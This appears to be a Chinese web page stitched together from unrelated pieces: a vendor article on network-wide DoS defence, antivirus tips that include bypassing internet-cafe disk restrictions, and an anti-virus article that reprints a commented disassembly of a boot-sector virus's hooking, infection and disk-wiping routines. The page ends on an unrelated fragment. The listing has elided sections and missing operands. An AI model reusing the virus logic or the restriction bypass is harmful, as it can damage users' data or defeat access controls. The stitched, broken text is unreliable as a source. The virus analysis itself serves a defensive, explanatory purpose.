<br /><br />建立全局的安全体系 防范“拒绝服务(DOS)”攻击<BR><BR><BR>尽管多年来全球无数网络安全专家都在着力开发DoS攻击的解决办法,但到目前为止收效不大,这是因为DoS攻击利用了TCP协议本身的弱点。DoS攻击使用相对简单的攻击方法,可以使目标系统完全瘫痪,甚至破坏整个网络。因此Extreme Networks认为,只有从网络的全局着眼,在网间基础设施的各个层面上采取应对措施,包括在局域网层面上采用特殊措施,及在网络传输层面上进行必要的安全设置,并安装专门的DoS识别和预防工具,才能最大限度地减少DoS攻击所造成的损失。 <BR><BR>建立这样一个全面系统的网络安全体系,网络的基础架构必须是以三层交换和路由为核心的智能型网络,并在此基础上,提供完善的三层以上的安全策略管理工具,并提供对专业的安全管理软件支持的能力。Extreme Networks 一直是三层及多层交换技术的领导者,在为用户提供强大的带宽和速度的同时,也具备一套非常完善的网络管理工具,特别是针对DoS最难以解决的流量型攻击,Extreme Ware管理套件提供了有效的识别机制和强硬的控制手段。 <BR><BR>将最先进的三层交换技术和多层安全防范体系结合起来,是认真考虑抵抗DoS攻击的用户的最佳选择。而且在进行网络的设计阶段,就应该从局域网层面和网络传输层面进行合理的布置。 <BR><BR>局域网层面问题 <BR><BR>在局域网层面上,系统管理员可以采取大量的预防措施,防止DoS攻击带来的服务不能效应。这些预防措施包括:保持坚实的整体管理和安全程序,针对各类DoS攻击,实施特定的防卫措施等等。与特定DoS攻击类型有关的其它方法可以包括:关闭或限制可能被损坏或暗中破坏的特定服务。遗憾的是,这些限制措施还必须与其可能给合法应用(如采用UDP作为传输机制的 Real Audio) 带来的影响进行权衡。如果攻击者能够胁迫受害人不使用有益的 <BR><BR>IP服务或合法应用,那么在一定程度上,这些黑客已经达到了自己的目标。 <BR><BR>网络传输层问题 <BR><BR>尽管局域网管理员采取的措施在防止和抗击DoS攻击的基础工作中发挥着关键作用,但它们还必须在网络传输层实现某些完善的措施,以对基础工作进行有效补充。 <BR><BR>保护网络数据流量 <BR><BR>有效地保护网络数据流量涉及大量的互补战略,包括采用多层交换,实现独立于层的访问控制;利用可定制的过滤和“信任邻居”标准;控制非授权用户的网络登录访问。 <BR><BR>独立于层的线速服务质量(QoS)和访问控制选项 <BR><BR>带有可配置智能软件、独立于层的QoS和访问控制功能的线速多层交换系统的出现,大大改善了网络传输设施保护数据流量完整性的能力。 <BR><BR>在基于传统路由器的网络设施中,认证机制如滤除带有内部地址的假冒分组,要求流量到达路由器边缘,并与特定访问控制列表中的标准相符。由于要维护访问控制列表,这一过程不仅耗时巨大,而且给整体路由器性能带来了重大开销。 <BR><BR>相比之下,使用线速多层交换系统允许灵活实现各种基于策略的访问控制标准,它使用许多相同的机制,这些机制对在整个复杂网络设施中有效地实现QoS标准至关重要。 <BR><BR>尽管这些多层交换系统在第二层执行线速交换功能,但它们能够从第一层到第四层及其它信源无缝地采用QoS和访问控制标准。 <BR><BR>这种独立于层的访问控制能力实现了内置灵活性,把安全决策与网络结构决策完全分开,从而允许网络管理员有效地部署DoS预防措施,而不必采用次优的路由或交换拓扑。结果,网络管理员和服务供应商现在能够把整个城域网、数据中心或企业网环境中基于策略的控制标准无缝地集成起来,而不管其采用的是复杂的基于路由器的核心服务,还是相对简单的第二层交换本地环路。此外,线速处理标准查表和数据流量认证决策,可以在后台有效执行DoS应对措施,而很少或没有性能延迟。 <BR><BR>可以定制的过滤和“信任邻居”机制 <BR><BR>智能多层访问控制的另一优点是,它能够简便地实现定制过滤操作,如根据特定标准定制对系统响应的控制力度。通过这种方式,可以防止网络受到DoS攻击的影响,同时降低因疏忽丢弃合法流量的危险。独立于层的访问控制的另一个优点是,它能够定制路由访问策略,支持具体系统之间“信任邻居”关系,从而管理和优化系统间的数据流量。此外,多层交换技术提供了多种选项,可以防止未经授权使用内部路由策略,及防止潜在的破坏活动。 <BR><BR>Extreme Networks(r)公司的Extreme Ware(tm)套装软件允许映射和覆盖IEEE802.1p和DiffServ标记,实现外部看不到的DiffServ功能。通过使用这些策略机制,系统管理员可以针对来自特定相邻系统的流量,调整内部路由控制策略,而不是在内部强制广播实际策略。 <BR><BR>由于能够灵活地区分内部和外部DiffServ和IEEE802.1p标准,ExtremeWare为防止新一轮潜在DoS攻击(称为QoS攻击)提供了有效的工具。 <BR><BR>Extreme Ware能够维护不可视的内部DiffServ处理策略,使得所有Extreme交换机都能够简便地忽略、观察或处理从可能“不信任的邻居”收到的任何DiffServ标记。 <BR><BR>定制网络登录配置操作 <BR><BR>网络登录机制的采用在减少DoS攻击漏洞中发挥着关键作用。网络登录采用惟一的用户名和口令,在用户获准进入或传送分组流量前认证用户身份,从而防止认证前发生DoS攻击的危险。 <BR><BR>通过利用DHCP模拟拨号技术采用PPP的方式,网络登录可以终止网络边缘的非法访问,减轻给网络设施带来的任何消极影响。 <BR><BR>Extreme Networks公司的技术团队成员参与编写了IEEE802.1草案,通过利用其中包含的规范中已有的标准,这些网络登录机制可以控制用户对交换机的访问,最大限度地降低直接DoS攻击的危险。同时,网络登录为管理和跟踪企业或服务供应商网络内部的用户连接和交易提供了一种强健的机制。 <BR><BR>保护网络基础设施 <BR><BR>除保护网络数据流量外,防止网络基础设施受到DoS攻击、确保可靠性和容错能力也同样重要。保护基础设施的关键是维护独立的访问列表,紧密管理转发控制和负载均衡功能,及进行严格的设计测试,以确保系统容错能力。
<br /><br />金山毒霸6的三大另类用法<br><br>金山毒霸6的主要功能是杀病毒,除此以外它还有其他妙用,而且功能还很不简单呢!下面就让我们一起来体验一下金山毒霸6带给我们的惊喜。<br><br>一、恢复EXE文件关联<br>如果木马、病毒或误操作破坏了EXE文件的正常关联,则会导致本机中所有EXE文件无法运行。其实用金山毒霸6能很快恢复EXE文件关联。<br><br>进入金山毒霸6的安装目录,找到金山毒霸6的主程序kav32.EXE文件,把它改名为kav32.com,然后运行kav32.com,这样金山毒霸6的主程序就被启动了。关闭该文件,再把kav32.com改名为kav32.EXE,再运行任何EXE文件试试,结果都可以运行了。因为金山毒霸6每次启动时都会自动检查注册表中的EXE关联是否正确,如果不是系统的默认值就会自动恢复。因此只要将kav32.EXE改名为kav32.com文件运行一次,金山毒霸就会帮我们自动恢复EXE文件关联,而我们正是巧妙地利用了这一点。<br><br>注意:金山毒霸6提供的金山毒霸IE修复器也具有恢复EXE文件关联的功能。<br><br>二、解锁注册表<br>到金山毒霸6的安装目录下,找到金山毒霸6病毒防火墙KWatchUI.EXE文件,把它改名为1.exe,然后到Windows所在目录下把注册表编辑器的Regedit.exe这个文件拷贝到金山毒霸6所在文件夹下,并改名为KWatchUI.EXE。运行金山毒霸6,在程序的主界面中选择“工具”菜单下的“金山毒霸病毒防火墙”,启动运行的正是我们需要的注册表编辑器。赶快展开注册表到“HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System”主键,在右边窗口中找到DWORD值“Disableregistrytools”,把它的键值改为“0”就可以给注册表解锁了。<br><br>三、突破网吧中对硬盘访问的限制<br>网吧为了方便管理,常使用软件限制我们访问本地硬盘。现在我们要利用金山毒霸6来突破这个限制。<br>打开金山毒霸,在运行窗口单击“帮助”→“联机帮助”,会出现帮助窗口,在该窗口中用鼠标右键点击标题栏,在弹出菜单中选择“跳至URL?J?...”,会出现如图所示对话框 ,在该窗口的“跳至该URL?J?”栏中输入file?//C?/,点击“确定”按钮就可以进入C盘。同样的方法,把C改成其他盘符或路径,我们就可以访问这些盘了。
[此贴子已经被作者于2006-10-23 21:17:41编辑过]
<br /><br />
一、带毒环境下检测清除病毒的意义 <BR><BR>??目前在我国流行的病毒一般可分为引导型病毒 、文件型病毒和混合型病毒 。引导型病毒的特点是它寄生在软盘的DOS引导扇区和硬盘的主引导记录或DOS引导区中 ,开机时由计算机自动读入内存中执行文件型病毒则将自身附加在可执行文件上 ,在执行被感染程序时,病毒首先获得控制权,进行驻留或破坏等活动。混合型病毒既能感染引导区也能感染可执行文件,具有更强的传染性。常用的杀毒软件有瑞星2004、金山毒霸、KV300 、公安部的KILL 、美国McAfee公司的SCAN和CLEAN等 ,这些软件各有自身的优点。但是在一个带毒的环境下,也即在病毒已经驻留在内存中的情况下,这些杀毒软件都存在不足并可能带来一些不良的后果。 <BR>?? <BR>??当系统感染一种已知病毒时,KILL和SCAN 发现内存中有病毒后,一般是拒绝继续执行,并要求用干净的盘重新启动。KV300发现类似的警告信息,但提供给用户一个选择的机会,以确定是否继续执行, 很显然 ,若用户选择继续 ,所带来的后果是不可预期的。 <BR>??<BR>??当系统感染一种未知病毒时,三种软件在未发现内存中有已知病毒后,都假设系统中无病毒,忠实地执行检测或清除功能。事实上,这个未知病毒可能会在检测时传染盘中所有的可执行文件。 <BR><BR>??由上面的讨论可知,清查病毒时只有从绝对干净的盘启动,而且要求杀毒软件自身无毒,才能够保证万无一失。然而,由于人们相互拷贝各种软件,很大程度上帮助了病毒的传播,在许多情况下, 要获得一张干净的启动盘很不容易,并且对于一些对计算机系统了解不是很多的使用者来说,他们根本 无法断定一张启动盘是不是干净的。因此,探讨在带毒环境下进行病毒检测和清除的方法是很有意义的 。 <BR>??<BR>?? 二 、带毒环境下检测清除病毒的原理 <BR>?? <BR>??对于一个驻留内存伺机进行传染和破坏的病毒来说,一般都要截取某些中断向量,当其他程序调用这些中断时,病毒重新取得控制权,判断是否满足特定的条件,满足则激活传染或破坏部分,在条件不满足的情况下一般是调用原中断服务程序,实现正常的系统功能。<BR><BR>??引导型病毒常接管INT13H、08H、10H等中断;文件型病毒则常接管INT21H、24H、25H、26H、1CH 、13H、10H等中断。<BR> <BR>举一个例子: 该例子转自黑白网络"一个主引导区病毒的分析 作者:sinister<BR><BR>病毒体: <BR>JMP 01AF ;JMP到01AF <BR>DB 00 ;病毒标计 <BR>DW 00F5 ;此为搬到高位址后,远程跳转指令 <BR>DW 9F80 ;目的地,也就是跳下一个指令XOR AX,AX <BR>DB 02 <BR>DW 0003 ;此为软盘识别标记,硬盘为0007 <BR>DW EC59 ; <BR>DW F000 ;INT 13H的原入口 <BR>. <BR>. <BR>. <BR>. <BR>. <BR>XOR AX,AX ;清除AX <BR>MOV DS,AX; ;让DS=0000 <BR>CLI ;清I标志积存器 <BR>MOV SS,AX ;把堆栈设为0000:7C00也就是开机 <BR>MOV AX,7C00 ;后载入引导分区表的地址,目前地址 <BR>MOV SP,AX ;开机时为0000:7CB6 <BR>STI ;设I标志积存器 <BR>PUSH DS ;把DS=0000,AX=7C00压栈,留给0B33:024A <BR>PUSH AX ;用RETF,把程序转到引导或分区表位置 <BR>MOV AX, ;取中断向量表中,INT 13H的偏移位置 <BR>MOV ,AX ;保存INT 13H的偏移位置,也就是存在 <BR>MOV AX, ;取INT 13H的段地址 <BR>MOV ,AX ;存到010C <BR><BR>;以上是HOOK系统读写盘调用INT 13用病毒体替代原INT 13 <BR>;读写以便传播发作 <BR><BR><BR>MOV AX, ;取得内存K数,放在AX <BR>DEC AX ; <BR>DEC AX ;减2k内存 <BR>MOV ,AX ;存回,通常是638K <BR>MOV CL,06 ; <BR>SHL AX,CL ; <BR>MOV ES,AX ;算出减2K后病毒本体的位址 <BR>MOV ,AX ;AX存入0105 <BR><BR><BR>;病毒常用手法将系统高段内存减少以便驻留 <BR>;这样可以免于被其他程序覆盖 <BR><BR><BR>MOV AX,000E ;病毒拦INT 13H <BR>;ISR起始的偏移量 <BR>MOV ,AX ; <BR>MOV ,ES ;设原为病毒的INT 13H <BR>MOV CX,01BE ;病毒长度为1BE <BR>MOV SI,7C00 ;从JMP 01AF开始 <BR>XOR DI,DI ;DI=0 <BR>CLD ;清方向标志 <BR>REPZ; <BR>MOVSB ;CX=1BE,将病毒自身搬移到高位址,目地是使其引导或 <BR>CS: ;分区表能载入0000:7C00正常运作 <BR>JMP FAR ;跳到为搬过后的位址 <BR>XOR AX,AX ;清AX <BR>MOV ES,AX ;ES=0000 <BR>INT 13 ;复位磁盘 <BR>PUSH CS ; <BR>POP DS ;让DS=CS <BR>MOV AX,0201 ;用INT 13H读一扇区,是引导,或分区表则 <BR><BR>MOV BX,7C00 ;读到0000:7C00 <BR>MOV CX, ;硬盘第0道,第7扇区 <BR>CMP CX,+07 ;比较是否从硬盘启动 <BR>JNZ 0213 ;不是跳0213 <BR>MOV DX,0080 ;第一硬盘C:第零面 <BR>INT 13 ;用INT 13号中断,读 <BR>JMP 023E ;跳023E比较日期,发作或正常开机 <BR>MOV CX, ;软盘0道,第3扇区 <BR>MOV DX,0100 ;A:的第0面 <BR>INT 13 ;INT 13读盘 <BR>JB 023E ;失败跳023E <BR>PUSH CS <BR>POPES ;让ES=CS <BR>MOV AX,0201 ; <BR>MOV BX,0200 ; <BR>MOV CX,0001 ; <BR>MOV DX,0080 ; <BR>INT 13 ;读入C:的分区表到0200,以便下面比较 <BR>JB 023E ;失败跳023E <BR>XOR SI,SI ;清SI <BR>CLD ;清方向标志以便比较 <BR>LODSW ;载入一个WORD到AX <BR>CMP AX, ;比较有无病毒存在..E9AC <BR>JNZ 0287 ;没有则跳0287传染 <BR>LODSW ;载入一个WORD到AX <BR>CMP AX, ;再次确认..0000 <BR>JNZ 0287 ;没有跳0287 <BR>XOR CX,CX ;清CX <BR>MOV AH,04 ; <BR>INT 1A ;取得日期 <BR>CMP DX,0306 ;是否为三月六日 <BR>JZ 024B ;是跳024B传染 <BR>RETF ;把程序交还给引导启动完成 <BR><BR><BR>步骤4:病毒INT 13代码分析 <BR>方法:U <BR><BR>PUSH DS ;首先把要用到积存器 <BR>PUSH AX ;入栈保存 <BR>OR DL,DL ;比较是否为软盘 <BR>JNZ 002F ;如不是则退出传染 <BR>XOR AX,AX ;AX=0 <BR>MOV DS,AX ;数据代段=0 <BR>TEST BYTE PTR ,01 ;比较是否为A盘 <BR>JNZ 002F ;不是则退出 <BR>POP AX ;将以上保存积存器 <BR>POP DS ;弹栈恢复 <BR>PUSHF ;压栈标志积存器 <BR>CS: ;以便执行原INT 13 <BR>CALL FAR ;执行原INT 13 <BR>PUSHF ;再次压栈 <BR>CALL 0036 ;以便跳转到传染程序 <BR>POPF ;跳转到执行传染 <BR>RETF 0002 ;结束中断调用返回 <BR>POP AX ;恢复 <BR>POP DS ;堆栈 <BR>CS: ;跳转到原正常INT 13 <BR>JMP FAR ;地址执行 <BR><BR><BR>;此段代码中展现了病毒常用手法,利用标志积存器做跳转 <BR><BR><BR>步骤5:传染过程分析 <BR>方法:U <BR><BR>对软盘传染过程: <BR><BR>PUSH AX ;工 <BR>PUSH BX ;作 <BR>PUSH CX ;寄 <BR>PUSH DX ;存 <BR>PUSH DS ;器 <BR>PUSH ES ;入 <BR>PUSH SI ;栈 <BR>PUSH DI ;保存 <BR>PUSH CS ;以压/弹栈方式 <BR>POP DS ;使数据段DS和 <BR>PUSH CS ;附加段ES均指向 <BR>POP ES ;代码段CS <BR>MOV SI,0004 ;试4次 <BR>MOV AX,0201 ;设置各 <BR>MOV BX,0200 ;积存器 <BR>MOV CX,0001 ;为读软盘 <BR>XOR DX,DX ;引导扇区做准备 <BR>PUSHF ;压栈标志积存器 <BR>CALL FAR ;正常的INT 13调用 <BR>JNB 0063 ;成功则转判断 <BR>XOR AX,AX ;不成功复位 <BR>PUSHF ;磁盘继续读 <BR>CALL FAR ;如果4次 <BR>DEC SI ;均匀不成功 <BR>JNZ 0045 ;则退出跳转 <BR>JMP 00A6 ;退出传染 <BR>XOR SI,SI ;SI=0以便用 <BR>CLD ;LODSW读入软盘 <BR>LODSW ;第1或第2字进行比较 <BR>CMP AX, ;比较如果不包含病毒标志 <BR>JNZ 0071 ;则跳转写传染 <BR>LODSW ;如果已有标志 <BR>CMP AX, ;则退出 <BR>JZ 00A6 ;传染子程序 <BR>MOV AX,0301 ;为写盘准备 <BR>MOV DH,01 ;如果是360K <BR>MOV CL,03 ;则写到1面0道3扇区 <BR>CMP BYTE PTR ,FD ;比较软盘 <BR>JZ 0080 ;如果大于360K <BR>MOV CL,0E ;写到1面0道14扇区 <BR>MOV ,CX ;写病毒标志到软盘 <BR>PUSHF ;调用原INT 13 <BR>CALL FAR ;进行传染 <BR>JB 00A6 <BR>MOV SI,03BE ;以下是将正常 <BR>MOV DI,01BE ;引导扇区从 <BR>MOV CX,0021 ;1BE起的21字节内容 <BR>CLD ;搬移到病毒程序尾部 <BR>REPZ ;开始复制 <BR>MOVSW <BR>MOV AX,0301 ;写盘功能调用,写一个扇区 <BR>XOR BX,BX ;将病毒程序 <BR>MOV CX,0001 ;写入软盘引导扇区内 <BR>XOR DX,DX ;设置为软盘 <BR>PUSHF <BR>CALL FAR ;执行正常INT 13调用写盘 <BR>POP DI ;将 <BR>POP SI ;工 <BR>POP ES ;作 <BR>POP DS ;寄 <BR>POP DX ;存 <BR>POP CX ;器 <BR>POP BX ;退 <BR>POP AX ;栈 <BR>RET ;返回调用处 <BR><BR>对硬盘传染过程: <BR><BR>MOV CX,0007 ;第7扇区 <BR>MOV ,CX ;此处为硬盘引导标记 <BR>MOV AX,301 ;写功能调用 <BR>MOV DX,0080 ;设置为硬盘 <BR>INT 13 ;将正常引导扇区写到0面0道7扇区内 <BR>JB 13E ;失败则转 <BR>MOV SI,03BE ;原分区表地址 <BR>MOV DI,01BE ;目标地址 <BR>MOV CX,0021 ;整个分区表 <BR>REPNZ <BR>MOVSW ;开始复制 <BR><BR>;此段代码是将硬盘分区信息,搬移到病毒程序尾部 <BR>;这样在分析着查看硬盘分区信息时仍能看到该部分 <BR>;内容,以次来麻痹分析者 <BR><BR>MOV AX,0301 ;准备写病毒提进硬盘 <BR>XOR BX,BX ;病毒体位置 <BR>INC CL ;第一扇区 <BR>INT 13 ;开始写盘传染 <BR>JMP 013E ;转到13E处判断是否为3月6日,是则发作 <BR><BR><BR>步骤6:破坏过程分析 <BR>方法:U <BR><BR>主要分析对硬盘数据破坏: <BR><BR>. <BR>. <BR>. <BR>. <BR>. <BR>MOV DL,80 <BR>MOV BYTE PTR,04 <BR><BR>;准备写硬盘 <BR>MOV AL,11 ;写17个扇区 <BR>MOV BX,5000 <BR>MOV ES,BX ;从内存ES:5000中处开始写 <BR>INT 13 ;残不人睹 <BR>JNB 0179 ;成功转179继续写 <BR>XOR AH,AH <BR>INT 13 ;不成功复位磁盘继续 <BR>INC DH ;使写操作磁头加1继续? <BR>CMP DH, ;比较是否小于0007单元值 <BR>JB 0150 ;是则返回开始处继续写 <BR>XOR DH,DH ;DH=0 <BR>INC CH ;再加扇区 <BR>JMP 0150 ;反回继续写 <BR><BR>;以上操作实际上是对硬盘执行4次写操作,每次17个扇区 <BR>;共68个扇区,这样就完全破坏了盘中的引导扇区,根目录 <BR>;和文件分配表。 <BR><BR><BR>引导扇区病毒,俺手里没有,这是一段DOS BOOT的分析。BOOT区病毒和他完成同样的工作,只不过每次 <BR>读盘的时将自身写入磁盘。 <BR><BR>引导过程如下: <BR>1>调整堆栈位置 <BR>2>修改并用修改后的磁盘参数表来复位磁盘系统 <BR>3>计算根目录表的首扇区的位置及IO.SYS的扇区位置 <BR>4>读入根目录表的首扇区 <BR>5>检查根目录表的开头两项是否为IO.SYS及MSDOS.SYS <BR>6>将IO.SYS文件开头三个扇区读入内存0000:0700H处 <BR>7>跳到0000:0700H处执行IO.SYS,引导完毕 <BR><BR>003E FA CLI <BR>003F 33C0 XOR AX,AX <BR>0041 8ED0 MOV SS,AX <BR>0041 8ED0 MOV SS,AX <BR>0043 BC007C MOV SP,7C00 ; 初始化堆栈 <BR>0046 16 PUSH SS <BR>0047 07 POP ES ;(ES)=0000H <BR>0048 BB7800 MOV BX,0078 ;1EH 号中断向量的地址为0000:0078H <BR>004B 36 SS: ;(SS)=0000H <BR>004C C537 LDS SI, ;取1EH号中断向量的内容存入DS:SI <BR>004E 1E PUSH DS ;该中断向量指向一个11字节的磁盘参数表 <BR>004F 56 PUSH SI ;取到后压入堆栈中保存 <BR>0050 16 PUSH SS <BR>0051 53 PUSH BX ;保存地址0000:0078H <BR>0052 BF3E7C MOV DI,7C3E ;7C3E-7C00=003EH,即偏移003EH,以下类推 <BR>0055 B90B00 MOV CX,000B ;磁盘参数表共11字节 <BR>0058 FC CLD <BR>0059 F3 REPZ <BR>005A A4 MOVSB ;将磁盘参数表复制到0000:7C3EH处 <BR>005B 06 PUSH ES <BR>005C 1F POP DS ;(DS)=0000H <BR>005D C645FE0F MOV BYTE PTR ,0F ;修改参数表中"磁头定位时间" <BR>0061 8B0E187C MOV CX, ;从BPB中取"每磁道扇区数" <BR>0065 884DF9 MOV ,CL ;修改参数表中"每磁道扇区数" <BR>0068 894702 MOV ,AX ;(AX)=0000H,修改1EH号中断向量(段址) <BR>006B C7073E7C MOV WORD PTR ,7C3E ;修改1EH号中断向量(偏移),这样1EH号 <BR>006F FB STI ;中断向量的内容为0000:7C3EH,指向新的磁盘参数表 <BR>0070 CD13 INT 13 ;用新的磁盘参数表来复位磁盘 <BR>0072 7279 JB 00ED ;出错则转出错处理 <BR><BR><BR>; 下面一段程序计算扇区位置 <BR>0074 33C0 XOR AX,AX <BR>0076 3906137C CMP ,AX ;偏移0013H处是Dos分区的总扇区数 <BR>007A 7408 JZ 0084 ;为零表示大硬盘? <BR>007C 8B0E137C MOV CX, ;不为0则取出来放到偏移0020H处 <BR>0080 890E207C MOV ,CX ;这个值本程序未用,似乎为IO.SYS准备的 <BR>0084 A0107C MOV AL, ;取FAT表的个数 <BR>0087 F726167C MUL WORD PTR ;乘以一个FAT表所占的扇区数 <BR>008B 03061C7C ADD AX, ;加上Dos分区前的扇区数(隐藏扇数,低位) <BR>008F 13161E7C ADC DX, ; 高位 <BR>0093 03060E7C ADD AX, ;加上Dos分区内的保留扇区数(低位) <BR>0097 83D200 ADC DX,+00 ; (高位) <BR>009A A3507C MOV ,AX ;根目录表的首扇的逻辑扇区号(低位) <BR>009D 8916527C MOV ,DX ; (高位) <BR>00A1 A3497C MOV ,AX ;此处放IO.SYS的首扇的逻辑扇区号(低位) <BR>00A4 89164B7C MOV ,DX ; (高位) <BR>00A8 B82000 MOV AX,0020 ;根目录表中每项占32字节 <BR>00AB F726117C MUL WORD PTR ;乘以根目录表中的项数 <BR>00AF 8B1E0B7C MOV BX, ;取"每扇区的字节数" <BR>00B3 03C3 ADD AX,BX ;这两条指令是为了取整 <BR>00B5 48 DEC AX <BR>00B6 F7F3 DIV BX ;除以每扇字节数,得到根目录所占扇区数 <BR>00B8 0106497C ADD ,AX ;得到根目录表后首扇的逻辑扇区号(低位) <BR>00BC 83164B7C00 ADC WORD PTR ,+00 ; (高位) <BR><BR>;下面一段程序在根目录表中找系统文件IO.SYS和MSDOS.SYS <BR>00C1 BB0005 MOV BX,0500 ;内存缓冲区的偏移值 <BR>00C4 8B16527C MOV DX, ;取根目录表的首扇的逻辑扇区号(高位) <BR>00C8 A1507C MOV AX, ; (低位) <BR>00CB E89200 CALL 0160 ;将逻辑扇区号转换为物理扇区号 <BR>00CE 721D JB 00ED ;出错则转出错处理 <BR>00D0 B001 MOV AL,01 <BR>00D2 E8AC00 CALL 0181 ;读一个扇区到内存(根目录的首扇) <BR>00D5 7216 JB 00ED ;出错处理 <BR>00D7 8BFB MOV DI,BX ;内存缓冲区的首址 <BR>00D9 B90B00 MOV CX,000B ;比较11个字节 <BR>00DC BEE67D MOV SI,7DE6 ;偏移01E6处是串"IO SYS",长11字节 <BR>00DF F3 REPZ <BR>00E0 A6 CMPSB ;看第一项是否为IO.SYS <BR>00E1 750A JNZ 00ED ;不是则出错 <BR>00E3 8D7F20 LEA DI, ;跳过32字节就指向第二项 <BR>00E6 B90B00 MOV CX,000B ;比较11个字节 <BR>00E9 F3 REPZ <BR>00EA A6 CMPSB ;看第二项是否为MSDOS.SYS <BR>00EB 7418 JZ 0105 ;是则两个文件都已找到,跳过出错处理 <BR><BR><BR>;下面一段进行出错处理 <BR>00ED BE9E7D MOV SI,7D9E ;偏移019EH处是串"Non system disk..." <BR>00F0 E85F00 CALL 0152 ;显示字符串 <BR>00F3 33C0 XOR AX,AX <BR>00F5 CD16 INT 16 ;等待任一键按下 <BR>00F7 5E POP SI <BR>00F8 1F POP DS ;得到1EH号中断向量的地址0000:0078H <BR>00F9 8F04 POP <BR>00FB 8F4402 POP ;恢复1EH号中断向量的内容 <BR>00FE CD19 INT 19 ;自举 <BR>0100 58 POP AX <BR>0101 58 POP AX <BR>0102 58 POP AX ;清理堆栈 <BR>0103 EBE8 JMP 00ED ;再次试图起动 <BR><BR><BR>;下面读入IO.SYS的头3个扇区到内存0000:0700H处 <BR>0105 8B471A MOV AX, ;从根目录表第一项中取IO.SYS的首簇号 <BR>0108 48 DEC AX <BR>0109 48 DEC AX ;首簇号减二 <BR>010A 8A1E0D7C MOV BL, ;取每簇的扇区数 <BR>010E 32FF XOR BH,BH <BR>0110 F7E3 MUL BX ;(首簇号 - 2)乘以 每簇的扇区数 <BR>0112 0306497C ADD AX, ;相加后得到IO.SYS的首扇的逻辑扇区号 <BR>0116 13164B7C ADC DX, <BR>011A BB0007 MOV BX,0700 ;内存缓冲区的偏移值 <BR>011D B90300 MOV CX,0003 ;循环计数初值,读3个扇区 <BR>0120 50 PUSH AX ;逻辑扇区号进栈(低位) <BR>0121 52 PUSH DX ; (高位) <BR>0122 51 PUSH CX ;循环计数器进栈 <BR>0123 E83A00 CALL 0160 ;逻辑扇区号转换为物理扇区号 <BR>0126 72D8 JB 0100 ;出错处理 <BR>0128 B001 MOV AL,01 <BR>012A E85400 CALL 0181 ;读一个扇区到内存缓冲区 <BR>012D 59 POP CX ;循环计数出栈 <BR>012E 5A POP DX <BR>012F 58 POP AX ;逻辑扇区号出栈 <BR>0130 72BB JB 00ED ;读盘出错处理 <BR>0132 050100 ADD AX,0001 <BR>0135 83D200 ADC DX,+00 ;下一个扇区 <BR>0138 031E0B7C ADD BX, ;缓冲区指针移动一个扇区的大小 <BR>013C E2E2 LOOP 0120 ;循环读入三个扇区 <BR>013E 8A2E157C MOV CH, ;取"磁盘介质描述",传给IO.SYS <BR>0142 8A16247C MOV DL, ;取"系统文件所在的驱动器号" <BR>0146 8B1E497C MOV BX, ;取IO.SYS的首扇的逻辑扇区号 <BR>014A A14B7C MOV AX, <BR>014D EA00007000 JMP 0070:0000 ;执行IO.SYS,引导完毕 <BR><BR>;显示字符串的子程序 <BR>0152 AC LODSB ;从串中取一个字符 <BR>0153 0AC0 OR AL,AL <BR>0155 7429 JZ 0180 ;为0则已到串尾,返回(共用RET指令) <BR>0157 B40E MOV AH,0E <BR>0159 BB0700 MOV BX,0007 <BR>015C CD10 INT 10 ;显示该字符 <BR>015E EBF2 JMP 0152 ;循环显示下一个 <BR><BR>;将逻辑扇区号转换为物理扇区号的子程序 <BR>0160 3B16187C CMP DX, ;这两条指令是为了避免第二次除法时除数 <BR>0164 7319 JNB 017F ;为0 <BR>0166 F736187C DIV WORD PTR ;逻辑扇取号除以每道扇区数,商(AX)=总磁 <BR>016A FEC2 INC DL ;道数,余数(DX)再加一即为扇区号,因为扇 <BR>016C 88164F7C MOV ,DL ;区号是从1开始的,而不是从0开始 <BR>0170 33D2 XOR DX,DX <BR>0172 F7361A7C DIV WORD PTR ;总磁道数(AX)再除以面数,所得的 <BR>0176 8816257C MOV ,DL ;余数(DX)=面号(即磁头号) <BR>017A A34D7C MOV ,AX ;商(AX)=磁道号 <BR>017D F8 CLC <BR>017E C3 RET ;正常返回 <BR>017F F9 STC <BR>0180 C3 RET ;异常返回 <BR><BR>;读一个扇区的子程序 <BR>0181 B402 MOV AH,02 ;读功能调用 <BR>0183 8B164D7C MOV DX, ;需要的入口参数如下: <BR>0187 B106 MOV CL,06 ;(DL)=驱动器号 <BR>0189 D2E6 SHL DH,CL ;(DH)=面号 <BR>018B 0A364F7C OR DH, ;(CH)=磁道号 <BR>018F 8BCA MOV CX,DX ;(CL)=扇区号(第6,7位为磁道号的高2位) <BR>0191 86E9 XCHG CH,CL ;(AL)=要读的扇区数 <BR>0193 8A16247C MOV DL, ;(ES:BX)=缓冲区首址 <BR>0197 8A36257C MOV DH, <BR>019B CD13 INT 13 <BR>019D C3 RET <BR>9x下的主引导/引导扇区没大区别,为了识别大分区用了一个INT 13的扩展调用42H。<BR><BR>?? <BR>??既然病毒是通过接管中断来获取传染和破坏的机会,那么我们是否有办法找回被病毒接管的中断 服务程序的地址,从而杀毒软件可以直接调用原中断,避免激活病毒? 笔者认为这是可能的,因为病毒在接管中断后,一般只对读写操作 、文件操作和执行等子功能调用感兴趣,对于其他一些功能调用,病毒只是简单地调用原中断服务程序进行处理,并通常使用下列指令进行调用: <BR><BR>?? jmp xxxx:xxxx <BR>?? call xxxx:xxxx <BR> jmp far ptr cs: <BR> call far ptr cs: <BR>?? <BR>??以INT21H为例,我们可以调用取DOS版本号的子功能3306H,对整个调用过程进行单步跟踪,并假设病毒驻留的段地址与INT21H原中断段地址是不同的,如果调用过程中CS发生改变,我们把每次CS改变后 执行的第一条指令的地址都记录下来,那么INT21H原来的中断地址也必定在其中。 <BR>?? <BR>??但记录的地址不止一个,究竟哪个是我们所要找的呢?这里我们可以假设病毒在调原中断服务程序时把各个寄存器(指AX、BX、CX、DX 、SI、DI、DS、ES)都设置成我们调用时所设置的值,同时真正的中断服务程序返回时又会改变寄存器的值,这个假设在绝大多数情况下都是正确的,从该假设出发,只需在各个寄存器值有改变的情况下,记录下每次CS改变后的第一条指令的地址,那么在中断返回后,记录中的最近一个地址就是所需找的原中断地址。需要指出的是,如果内存中还有其他驻留程序也接管了INT21H所找到的地址同样绕过了这些驻留程序。<BR> 发现病毒,但是无论在安全模式还是Windows下都无法清除怎么办?<BR><BR><BR>由于某些目录和文件的特殊性,无法直接清除(包括安全模式下杀毒等一些方式杀毒),而需要某些特殊手段清除的带毒文件。以下所说的目录均包含其下面的子目录。 